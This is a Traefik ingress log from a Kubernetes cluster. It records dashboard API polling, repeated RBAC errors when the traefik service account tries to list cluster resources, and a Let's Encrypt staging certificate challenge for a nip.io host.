- - [30/Mar/2024:07:34:54 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 492 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:34:54 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 493 "api@internal" "-" 0ms +time="2024-03-30T07:34:55Z" level=debug msg="Serving default certificate for request: \"whoami.172.233.168.9.nip.io\"" +10.2.0.129 - - [30/Mar/2024:07:34:56 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 494 "-" "-" 0ms +W0330 07:34:58.391517 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +E0330 07:34:58.391553 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Secret: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +10.2.0.129 - - [30/Mar/2024:07:34:59 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 495 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:34:59 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 496 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:35:04 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 497 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:35:04 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 498 "api@internal" "-" 0ms +W0330 07:35:06.107006 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +E0330 07:35:06.107110 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Service: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +10.2.0.129 - - [30/Mar/2024:07:35:09 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 499 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:35:09 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 500 "api@internal" "-" 0ms +W0330 07:35:12.150127 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +E0330 07:35:12.150214 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Endpoints: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +10.2.0.129 - - [30/Mar/2024:07:35:14 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 501 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:35:14 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 502 "api@internal" "-" 0ms +W0330 07:35:15.398827 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +E0330 07:35:15.398871 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Ingress: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +10.2.0.129 - - [30/Mar/2024:07:35:19 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 503 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:35:19 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 504 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:35:23 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 505 "-" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:35:24 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 506 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:35:24 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 507 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:35:29 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 508 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:35:29 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 509 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:35:34 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 510 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:35:34 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 511 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:35:39 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 512 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:35:39 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 513 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:35:44 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 514 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:35:44 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 515 "api@internal" "-" 0ms +W0330 07:35:46.680428 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +E0330 07:35:46.680465 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Secret: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +W0330 07:35:47.322800 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +E0330 07:35:47.322836 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Service: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +10.2.0.129 - - [30/Mar/2024:07:35:49 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 516 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:35:49 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 517 "api@internal" "-" 0ms +W0330 07:35:51.183695 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +E0330 07:35:51.183748 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Ingress: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +10.2.0.129 - - [30/Mar/2024:07:35:54 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 518 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:35:54 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 519 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:35:59 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 520 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:35:59 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 521 "api@internal" "-" 0ms +W0330 07:36:00.317484 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +E0330 07:36:00.317515 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Endpoints: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +10.2.0.129 - - [30/Mar/2024:07:36:04 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 522 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:36:04 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 523 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:36:09 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 524 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:36:09 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 525 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:36:20 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 526 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:36:20 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 527 "api@internal" "-" 0ms +W0330 07:36:20.902995 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +E0330 07:36:20.903028 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Secret: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +W0330 07:36:30.431076 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +E0330 07:36:30.431111 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Service: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +W0330 07:36:47.346102 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +E0330 07:36:47.346137 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Ingress: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +W0330 07:36:54.429426 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +E0330 07:36:54.429457 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Endpoints: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +W0330 07:37:13.835322 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +E0330 07:37:13.835363 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Service: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +W0330 07:37:15.385410 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +E0330 07:37:15.385439 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Secret: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +10.2.0.129 - - [30/Mar/2024:07:37:20 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 529 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:37:20 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 528 "api@internal" "-" 0ms +W0330 07:37:21.347693 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +E0330 07:37:21.347778 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Ingress: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +W0330 07:37:42.603124 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +E0330 07:37:42.603159 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Endpoints: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +W0330 07:37:46.085685 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +E0330 07:37:46.085796 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Secret: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +time="2024-03-30T07:38:09Z" level=debug msg="Serving default certificate for request: \"whoami.172.233.168.9.nip.io\"" +10.0.0.4 - - [30/Mar/2024:07:38:09 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 530 "-" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:38:20 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 531 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:38:20 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 532 "api@internal" "-" 0ms +time="2024-03-30T07:38:38Z" level=debug msg="Configuration received: {\"http\":{\"routers\":{\"akashop-wp-whoami-172-233-168-9-nip-io\":{\"entryPoints\":[\"websecure\"],\"service\":\"akashop-wp-80\",\"rule\":\"Host(`whoami.172.233.168.9.nip.io`) \\u0026\\u0026 PathPrefix(`/`)\",\"tls\":{\"certResolver\":\"le\"}}},\"services\":{\"akashop-wp-80\":{\"loadBalancer\":{\"servers\":[{\"url\":\"http://10.2.1.35:80\"}],\"passHostHeader\":true}}}},\"tcp\":{},\"udp\":{}}" providerName=kubernetes +time="2024-03-30T07:38:39Z" level=debug msg="No default certificate, fallback to the internal generated certificate" tlsStoreName=default +time="2024-03-30T07:38:39Z" level=debug msg="Added outgoing tracing middleware dashboard@internal" middlewareName=tracing middlewareType=TracingForwarder entryPointName=traefik routerName=dashboard@internal +time="2024-03-30T07:38:39Z" level=debug msg="Creating middleware" middlewareType=StripPrefix entryPointName=traefik routerName=dashboard@internal middlewareName=dashboard_stripprefix@internal +time="2024-03-30T07:38:39Z" level=debug msg="Adding tracing to middleware" entryPointName=traefik routerName=dashboard@internal middlewareName=dashboard_stripprefix@internal +time="2024-03-30T07:38:39Z" level=debug msg="Creating middleware" entryPointName=traefik routerName=dashboard@internal middlewareName=dashboard_redirect@internal middlewareType=RedirectRegex +time="2024-03-30T07:38:39Z" level=debug msg="Setting up redirection from ^(http:\\/\\/(\\[[\\w:.]+\\]|[\\w\\._-]+)(:\\d+)?)\\/$ to ${1}/dashboard/" routerName=dashboard@internal middlewareName=dashboard_redirect@internal middlewareType=RedirectRegex entryPointName=traefik +time="2024-03-30T07:38:39Z" level=debug msg="Adding tracing to middleware" routerName=dashboard@internal middlewareName=dashboard_redirect@internal entryPointName=traefik +time="2024-03-30T07:38:39Z" level=debug msg="Added outgoing tracing middleware api@internal" entryPointName=traefik routerName=api@internal middlewareName=tracing middlewareType=TracingForwarder +time="2024-03-30T07:38:39Z" level=debug msg="Creating middleware" middlewareName=traefik-internal-recovery middlewareType=Recovery entryPointName=traefik +time="2024-03-30T07:38:39Z" level=debug msg="Creating middleware" routerName=akashop-wp-whoami-172-233-168-9-nip-io@kubernetes serviceName=akashop-wp-80 middlewareName=pipelining middlewareType=Pipelining entryPointName=websecure +time="2024-03-30T07:38:39Z" level=debug msg="Creating load-balancer" entryPointName=websecure routerName=akashop-wp-whoami-172-233-168-9-nip-io@kubernetes serviceName=akashop-wp-80 +time="2024-03-30T07:38:39Z" level=debug msg="Creating server 0 http://10.2.1.35:80" routerName=akashop-wp-whoami-172-233-168-9-nip-io@kubernetes serviceName=akashop-wp-80 serverName=0 entryPointName=websecure +time="2024-03-30T07:38:39Z" level=debug msg="child http://10.2.1.35:80 now UP" +time="2024-03-30T07:38:39Z" level=debug msg="Propagating new UP status" +time="2024-03-30T07:38:39Z" level=debug msg="Added outgoing tracing middleware akashop-wp-80" middlewareName=tracing middlewareType=TracingForwarder entryPointName=websecure routerName=akashop-wp-whoami-172-233-168-9-nip-io@kubernetes +time="2024-03-30T07:38:39Z" level=debug msg="Creating middleware" entryPointName=websecure middlewareName=traefik-internal-recovery middlewareType=Recovery +time="2024-03-30T07:38:39Z" level=debug msg="Adding route for whoami.172.233.168.9.nip.io with TLS options default" entryPointName=websecure +time="2024-03-30T07:38:39Z" level=debug msg="Trying to challenge certificate for domain [whoami.172.233.168.9.nip.io] found in HostSNI rule" providerName=le.acme ACME CA="https://acme-staging-v02.api.letsencrypt.org/directory" routerName=akashop-wp-whoami-172-233-168-9-nip-io@kubernetes rule="Host(`whoami.172.233.168.9.nip.io`) && PathPrefix(`/`)" +time="2024-03-30T07:38:39Z" level=debug msg="Looking for provided certificate(s) to validate [\"whoami.172.233.168.9.nip.io\"]..." rule="Host(`whoami.172.233.168.9.nip.io`) && PathPrefix(`/`)" providerName=le.acme ACME CA="https://acme-staging-v02.api.letsencrypt.org/directory" routerName=akashop-wp-whoami-172-233-168-9-nip-io@kubernetes +time="2024-03-30T07:38:39Z" level=debug msg="Domains [\"whoami.172.233.168.9.nip.io\"] need ACME certificates generation for domains \"whoami.172.233.168.9.nip.io\"." ACME CA="https://acme-staging-v02.api.letsencrypt.org/directory" routerName=akashop-wp-whoami-172-233-168-9-nip-io@kubernetes rule="Host(`whoami.172.233.168.9.nip.io`) && PathPrefix(`/`)" providerName=le.acme +time="2024-03-30T07:38:39Z" level=debug msg="Loading ACME certificates [whoami.172.233.168.9.nip.io]..." rule="Host(`whoami.172.233.168.9.nip.io`) && PathPrefix(`/`)" providerName=le.acme ACME CA="https://acme-staging-v02.api.letsencrypt.org/directory" routerName=akashop-wp-whoami-172-233-168-9-nip-io@kubernetes +time="2024-03-30T07:38:40Z" level=debug msg="Building ACME client..." providerName=le.acme +time="2024-03-30T07:38:40Z" level=debug msg="https://acme-staging-v02.api.letsencrypt.org/directory" providerName=le.acme +time="2024-03-30T07:38:41Z" level=info msg=Register... providerName=le.acme +time="2024-03-30T07:38:41Z" level=debug msg="legolog: [INFO] acme: Registering account for learn@akamai.com" +time="2024-03-30T07:38:41Z" level=debug msg="Using TLS Challenge provider." providerName=le.acme +time="2024-03-30T07:38:41Z" level=debug msg="legolog: [INFO] [whoami.172.233.168.9.nip.io] acme: Obtaining bundled SAN certificate" +time="2024-03-30T07:38:41Z" level=debug msg="legolog: [INFO] [whoami.172.233.168.9.nip.io] AuthURL: https://acme-staging-v02.api.letsencrypt.org/acme/authz-v3/11838762474" +time="2024-03-30T07:38:41Z" level=debug msg="legolog: [INFO] [whoami.172.233.168.9.nip.io] acme: use tls-alpn-01 solver" +time="2024-03-30T07:38:41Z" level=debug msg="legolog: [INFO] [whoami.172.233.168.9.nip.io] acme: Trying to solve TLS-ALPN-01" +time="2024-03-30T07:38:41Z" level=debug msg="TLS Challenge Present temp certificate for whoami.172.233.168.9.nip.io" providerName=tlsalpn.acme +time="2024-03-30T07:38:42Z" level=debug msg="Configuration received: {\"http\":{},\"tcp\":{},\"udp\":{},\"tls\":{}}" providerName=tlsalpn.acme +time="2024-03-30T07:38:42Z" level=debug msg="Adding certificate for domain(s) acme challenge temp,whoami.172.233.168.9.nip.io" +time="2024-03-30T07:38:42Z" level=debug msg="No default certificate, fallback to the internal generated certificate" tlsStoreName=default +time="2024-03-30T07:38:42Z" level=debug msg="Added outgoing tracing middleware dashboard@internal" routerName=dashboard@internal middlewareName=tracing middlewareType=TracingForwarder entryPointName=traefik +time="2024-03-30T07:38:42Z" level=debug msg="Creating middleware" routerName=dashboard@internal middlewareName=dashboard_stripprefix@internal middlewareType=StripPrefix entryPointName=traefik +time="2024-03-30T07:38:42Z" level=debug msg="Adding tracing to middleware" entryPointName=traefik routerName=dashboard@internal middlewareName=dashboard_stripprefix@internal +time="2024-03-30T07:38:42Z" level=debug msg="Creating middleware" middlewareName=dashboard_redirect@internal entryPointName=traefik routerName=dashboard@internal middlewareType=RedirectRegex +time="2024-03-30T07:38:42Z" level=debug msg="Setting up redirection from ^(http:\\/\\/(\\[[\\w:.]+\\]|[\\w\\._-]+)(:\\d+)?)\\/$ to ${1}/dashboard/" middlewareType=RedirectRegex middlewareName=dashboard_redirect@internal entryPointName=traefik routerName=dashboard@internal +time="2024-03-30T07:38:42Z" level=debug msg="Adding tracing to middleware" middlewareName=dashboard_redirect@internal entryPointName=traefik routerName=dashboard@internal +time="2024-03-30T07:38:42Z" level=debug msg="Added outgoing tracing middleware api@internal" middlewareName=tracing middlewareType=TracingForwarder entryPointName=traefik routerName=api@internal +time="2024-03-30T07:38:42Z" level=debug msg="Creating middleware" middlewareType=Recovery entryPointName=traefik middlewareName=traefik-internal-recovery +time="2024-03-30T07:38:42Z" level=debug msg="Creating middleware" serviceName=akashop-wp-80 routerName=akashop-wp-whoami-172-233-168-9-nip-io@kubernetes entryPointName=websecure middlewareName=pipelining middlewareType=Pipelining +time="2024-03-30T07:38:42Z" level=debug msg="Creating load-balancer" routerName=akashop-wp-whoami-172-233-168-9-nip-io@kubernetes entryPointName=websecure serviceName=akashop-wp-80 +time="2024-03-30T07:38:42Z" level=debug msg="Creating server 0 http://10.2.1.35:80" entryPointName=websecure serviceName=akashop-wp-80 serverName=0 routerName=akashop-wp-whoami-172-233-168-9-nip-io@kubernetes +time="2024-03-30T07:38:42Z" level=debug msg="child http://10.2.1.35:80 now UP" +time="2024-03-30T07:38:42Z" level=debug msg="Propagating new UP status" +time="2024-03-30T07:38:42Z" level=debug msg="Added outgoing tracing middleware akashop-wp-80" entryPointName=websecure routerName=akashop-wp-whoami-172-233-168-9-nip-io@kubernetes middlewareName=tracing middlewareType=TracingForwarder +time="2024-03-30T07:38:42Z" level=debug msg="Creating middleware" middlewareType=Recovery entryPointName=websecure middlewareName=traefik-internal-recovery +time="2024-03-30T07:38:42Z" level=debug msg="Adding route for whoami.172.233.168.9.nip.io with TLS options default" entryPointName=websecure +time="2024-03-30T07:38:42Z" level=debug msg="Trying to challenge certificate for domain [whoami.172.233.168.9.nip.io] found in HostSNI rule" rule="Host(`whoami.172.233.168.9.nip.io`) && PathPrefix(`/`)" ACME CA="https://acme-staging-v02.api.letsencrypt.org/directory" providerName=le.acme routerName=akashop-wp-whoami-172-233-168-9-nip-io@kubernetes +time="2024-03-30T07:38:42Z" level=debug msg="Looking for provided certificate(s) to validate [\"whoami.172.233.168.9.nip.io\"]..." ACME CA="https://acme-staging-v02.api.letsencrypt.org/directory" providerName=le.acme routerName=akashop-wp-whoami-172-233-168-9-nip-io@kubernetes rule="Host(`whoami.172.233.168.9.nip.io`) && PathPrefix(`/`)" +time="2024-03-30T07:38:42Z" level=debug msg="No ACME certificate generation required for domains [\"whoami.172.233.168.9.nip.io\"]." routerName=akashop-wp-whoami-172-233-168-9-nip-io@kubernetes rule="Host(`whoami.172.233.168.9.nip.io`) && PathPrefix(`/`)" ACME CA="https://acme-staging-v02.api.letsencrypt.org/directory" providerName=le.acme +time="2024-03-30T07:38:46Z" level=debug msg="legolog: [INFO] [whoami.172.233.168.9.nip.io] The server validated our request" +time="2024-03-30T07:38:46Z" level=debug msg="TLS Challenge CleanUp temp certificate for whoami.172.233.168.9.nip.io" providerName=tlsalpn.acme +time="2024-03-30T07:38:46Z" level=debug msg="legolog: [INFO] [whoami.172.233.168.9.nip.io] acme: Validations succeeded; requesting certificates" +time="2024-03-30T07:38:46Z" level=debug msg="Configuration received: {\"http\":{},\"tcp\":{},\"udp\":{},\"tls\":{}}" providerName=tlsalpn.acme +time="2024-03-30T07:38:46Z" level=debug msg="No default certificate, fallback to the internal generated certificate" tlsStoreName=default +time="2024-03-30T07:38:46Z" level=debug msg="Added outgoing tracing middleware api@internal" routerName=api@internal middlewareName=tracing middlewareType=TracingForwarder entryPointName=traefik +time="2024-03-30T07:38:46Z" level=debug msg="Added outgoing tracing middleware dashboard@internal" entryPointName=traefik routerName=dashboard@internal middlewareName=tracing middlewareType=TracingForwarder +time="2024-03-30T07:38:46Z" level=debug msg="Creating middleware" middlewareType=StripPrefix middlewareName=dashboard_stripprefix@internal entryPointName=traefik routerName=dashboard@internal +time="2024-03-30T07:38:46Z" level=debug msg="Adding tracing to middleware" middlewareName=dashboard_stripprefix@internal entryPointName=traefik routerName=dashboard@internal +time="2024-03-30T07:38:46Z" level=debug msg="Creating middleware" entryPointName=traefik routerName=dashboard@internal middlewareName=dashboard_redirect@internal middlewareType=RedirectRegex +time="2024-03-30T07:38:46Z" level=debug msg="Setting up redirection from ^(http:\\/\\/(\\[[\\w:.]+\\]|[\\w\\._-]+)(:\\d+)?)\\/$ to ${1}/dashboard/" middlewareType=RedirectRegex entryPointName=traefik routerName=dashboard@internal middlewareName=dashboard_redirect@internal +time="2024-03-30T07:38:46Z" level=debug msg="Adding tracing to middleware" entryPointName=traefik routerName=dashboard@internal middlewareName=dashboard_redirect@internal +time="2024-03-30T07:38:46Z" level=debug msg="Creating middleware" entryPointName=traefik middlewareName=traefik-internal-recovery middlewareType=Recovery +time="2024-03-30T07:38:46Z" level=debug msg="Creating middleware" entryPointName=websecure routerName=akashop-wp-whoami-172-233-168-9-nip-io@kubernetes serviceName=akashop-wp-80 middlewareName=pipelining middlewareType=Pipelining +time="2024-03-30T07:38:46Z" level=debug msg="Creating load-balancer" entryPointName=websecure routerName=akashop-wp-whoami-172-233-168-9-nip-io@kubernetes serviceName=akashop-wp-80 +time="2024-03-30T07:38:46Z" level=debug msg="Creating server 0 http://10.2.1.35:80" routerName=akashop-wp-whoami-172-233-168-9-nip-io@kubernetes serviceName=akashop-wp-80 serverName=0 entryPointName=websecure +time="2024-03-30T07:38:46Z" level=debug msg="child http://10.2.1.35:80 now UP" +time="2024-03-30T07:38:46Z" level=debug msg="Propagating new UP status" +time="2024-03-30T07:38:46Z" level=debug msg="Added outgoing tracing middleware akashop-wp-80" routerName=akashop-wp-whoami-172-233-168-9-nip-io@kubernetes middlewareName=tracing middlewareType=TracingForwarder entryPointName=websecure +time="2024-03-30T07:38:46Z" level=debug msg="Creating middleware" entryPointName=websecure middlewareType=Recovery middlewareName=traefik-internal-recovery +time="2024-03-30T07:38:46Z" level=debug msg="Adding route for whoami.172.233.168.9.nip.io with TLS options default" entryPointName=websecure +time="2024-03-30T07:38:46Z" level=debug msg="Trying to challenge certificate for domain [whoami.172.233.168.9.nip.io] found in HostSNI rule" ACME CA="https://acme-staging-v02.api.letsencrypt.org/directory" routerName=akashop-wp-whoami-172-233-168-9-nip-io@kubernetes rule="Host(`whoami.172.233.168.9.nip.io`) && PathPrefix(`/`)" providerName=le.acme +time="2024-03-30T07:38:46Z" level=debug msg="Looking for provided certificate(s) to validate [\"whoami.172.233.168.9.nip.io\"]..." routerName=akashop-wp-whoami-172-233-168-9-nip-io@kubernetes rule="Host(`whoami.172.233.168.9.nip.io`) && PathPrefix(`/`)" providerName=le.acme ACME CA="https://acme-staging-v02.api.letsencrypt.org/directory" 